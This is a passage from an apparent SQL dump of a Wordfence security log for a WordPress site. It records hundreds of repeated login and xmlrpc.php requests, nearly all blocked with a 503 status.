Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10313,0.000000,1630737703.542831,'\0\0\0\0\0\0\0\0\0\0��@�\0�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10314,0.000000,1630737765.102229,'\0\0\0\0\0\0\0\0\0\0���贮',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10315,0.000000,1630737893.417931,'\0\0\0\0\0\0\0\0\0\0��X�=�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10316,0.000000,1630738074.629346,'\0\0\0\0\0\0\0\0\0\0��#ժ�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10317,0.000000,1630738258.812032,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10318,0.000000,1630738435.739791,'\0\0\0\0\0\0\0\0\0\0��h�+�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10319,0.000000,1630738623.956407,'\0\0\0\0\0\0\0\0\0\0���M',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10320,0.000000,1630738651.720960,'\0\0\0\0\0\0\0\0\0\0���;v�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10321,0.000000,1630738800.299429,'\0\0\0\0\0\0\0\0\0\0��k�X�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10322,0.000000,1630738988.773711,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10323,0.000000,1630739343.242341,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10324,0.000000,1630739508.309065,'\0\0\0\0\0\0\0\0\0\0���6x]',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10325,0.000000,1630739714.445410,'\0\0\0\0\0\0\0\0\0\0��/J�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10326,0.000000,1630739890.655506,'\0\0\0\0\0\0\0\0\0\0��@��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10327,0.000000,1630740068.679330,'\0\0\0\0\0\0\0\0\0\0����L�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10328,0.000000,1630740205.293082,'\0\0\0\0\0\0\0\0\0\0��%�\r�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10329,0.000000,1630740254.462146,'\0\0\0\0\0\0\0\0\0\0��B!�~',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10330,0.000000,1630740424.971265,'\0\0\0\0\0\0\0\0\0\0���Y�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10331,0.000000,1630740600.173296,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10332,0.000000,1630740777.358564,'\0\0\0\0\0\0\0\0\0\0��]qo\"',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10333,0.000000,1630740947.904677,'\0\0\0\0\0\0\0\0\0\0��|��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10334,0.000000,1630741134.311481,'\0\0\0\0\0\0\0\0\0\0��N�(�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10335,0.000000,1630741280.946054,'\0\0\0\0\0\0\0\0\0\0����e�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10336,0.000000,1630741484.681811,'\0\0\0\0\0\0\0\0\0\0��h��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10337,0.000000,1630741647.954976,'\0\0\0\0\0\0\0\0\0\0��ár�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10338,0.000000,1630741809.284715,'\0\0\0\0\0\0\0\0\0\0����}�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10339,0.000000,1630742001.655795,'\0\0\0\0\0\0\0\0\0\0��[��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10340,0.000000,1630742184.889641,'\0\0\0\0\0\0\0\0\0\0���?%',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10341,0.000000,1630742358.971546,'\0\0\0\0\0\0\0\0\0\0��$\\',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10342,0.000000,1630742542.927865,'\0\0\0\0\0\0\0\0\0\0���*',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10343,0.000000,1630742596.973023,'\0\0\0\0\0\0\0\0\0\0��-�M^',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10344,0.000000,1630743472.443739,'\0\0\0\0\0\0\0\0\0\0���j �',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10345,0.000000,1630743984.734984,'\0\0\0\0\0\0\0\0\0\0��6\'1�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10346,0.000000,1630744162.816705,'\0\0\0\0\0\0\0\0\0\0���R-',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10347,0.000000,1630744334.561023,'\0\0\0\0\0\0\0\0\0\0��J�g�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10348,0.000000,1630744477.568772,'\0\0\0\0\0\0\0\0\0\0���\n',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10349,0.000000,1630744676.366230,'\0\0\0\0\0\0\0\0\0\0��E��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10350,0.000000,1630744853.567037,'\0\0\0\0\0\0\0\0\0\0��H\n�k',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10351,0.000000,1630744958.496354,'\0\0\0\0\0\0\0\0\0\0��a��',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10352,0.000000,1630745032.110728,'\0\0\0\0\0\0\0\0\0\0��3KR',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10353,0.000000,1630745195.086674,'\0\0\0\0\0\0\0\0\0\0���M',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10354,0.000000,1630745383.133544,'\0\0\0\0\0\0\0\0\0\0��go(',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10355,0.000000,1630745539.243038,'\0\0\0\0\0\0\0\0\0\0��/jv�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10356,0.000000,1630745707.852074,'\0\0\0\0\0\0\0\0\0\0����e�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10357,0.000000,1630745724.621838,'\0\0\0\0\0\0\0\0\0\0���2��',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10358,0.000000,1630745916.030557,'\0\0\0\0\0\0\0\0\0\0��Oe,',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10359,0.000000,1630746086.519970,'\0\0\0\0\0\0\0\0\0\0���M',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10360,0.000000,1630746299.190981,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10361,0.000000,1630746447.168261,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10362,0.000000,1630746632.272963,'\0\0\0\0\0\0\0\0\0\0���8\Z�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10363,0.000000,1630746797.127484,'\0\0\0\0\0\0\0\0\0\0����R�',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(10364,0.000000,1630746989.115702,'\0\0\0\0\0\0\0\0\0\0����<',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10365,0.000000,1630747033.893308,'\0\0\0\0\0\0\0\0\0\0���aD�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10366,0.000000,1630747158.837875,'\0\0\0\0\0\0\0\0\0\0���B��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10367,0.000000,1630747367.076211,'\0\0\0\0\0\0\0\0\0\0���VM�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10368,0.000000,1630747544.612581,'\0\0\0\0\0\0\0\0\0\0��UX�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10369,0.000000,1630747745.686475,'\0\0\0\0\0\0\0\0\0\0���_nq',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10370,0.000000,1630747769.221878,'\0\0\0\0\0\0\0\0\0\0����n�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10371,0.000000,1630747930.335398,'\0\0\0\0\0\0\0\0\0\0��Wk�6',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10372,0.000000,1630748101.019232,'\0\0\0\0\0\0\0\0\0\0��@�\0�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10373,0.000000,1630748286.815248,'\0\0\0\0\0\0\0\0\0\0��Bt�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10374,0.000000,1630748467.245070,'\0\0\0\0\0\0\0\0\0\0���>L�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10375,0.000000,1630748646.988625,'\0\0\0\0\0\0\0\0\0\0���h,5',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10376,0.000000,1630748828.039430,'\0\0\0\0\0\0\0\0\0\0��]qo�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10377,0.000000,1630749013.291757,'\0\0\0\0\0\0\0\0\0\0��Cܹ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10378,0.000000,1630749057.309909,'\0\0\0\0\0\0\0\0\0\0��ν�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10379,0.000000,1630749198.418708,'\0\0\0\0\0\0\0\0\0\0��[',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10380,0.000000,1630749376.031297,'\0\0\0\0\0\0\0\0\0\0��E��|',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10381,0.000000,1630749552.491779,'\0\0\0\0\0\0\0\0\0\0��ϴΥ',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10382,0.000000,1630749569.816730,'\0\0\0\0\0\0\0\0\0\0����%+',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10383,0.000000,1630749745.108105,'\0\0\0\0\0\0\0\0\0\0����E�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10384,0.000000,1630749789.688613,'\0\0\0\0\0\0\0\0\0\0���j �',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10385,0.000000,1630749919.799464,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10386,0.000000,1630750121.940223,'\0\0\0\0\0\0\0\0\0\0��4��~',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10387,0.000000,1630750280.980614,'\0\0\0\0\0\0\0\0\0\0��\"���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10388,0.000000,1630750485.403434,'\0\0\0\0\0\0\0\0\0\0��C��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10389,0.000000,1630750669.409313,'\0\0\0\0\0\0\0\0\0\0���26',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10390,0.000000,1630750862.422325,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10391,0.000000,1630751026.000126,'\0\0\0\0\0\0\0\0\0\0��g�|�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10392,0.000000,1630751222.926158,'\0\0\0\0\0\0\0\0\0\0��ár�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10393,0.000000,1630751401.103520,'\0\0\0\0\0\0\0\0\0\0���Ū�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10394,0.000000,1630751615.314860,'\0\0\0\0\0\0\0\0\0\0���> z',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10395,0.000000,1630751804.088678,'\0\0\0\0\0\0\0\0\0\0���c]�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10396,0.000000,1630751833.406057,'\0\0\0\0\0\0\0\0\0\0���n�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10397,0.000000,1630751995.977840,'\0\0\0\0\0\0\0\0\0\0����8\Z',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10398,0.000000,1630752182.898030,'\0\0\0\0\0\0\0\0\0\0���� g',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10399,0.000000,1630752349.427738,'\0\0\0\0\0\0\0\0\0\0����vH',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10400,0.000000,1630752564.176328,'\0\0\0\0\0\0\0\0\0\0���]�_',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10401,0.000000,1630752754.657628,'\0\0\0\0\0\0\0\0\0\0��p�H�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10402,0.000000,1630752923.374109,'\0\0\0\0\0\0\0\0\0\0��+���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10403,0.000000,1630753122.863846,'\0\0\0\0\0\0\0\0\0\0��]qo6',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10404,0.000000,1630753143.986839,'\0\0\0\0\0\0\0\0\0\0��l��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security 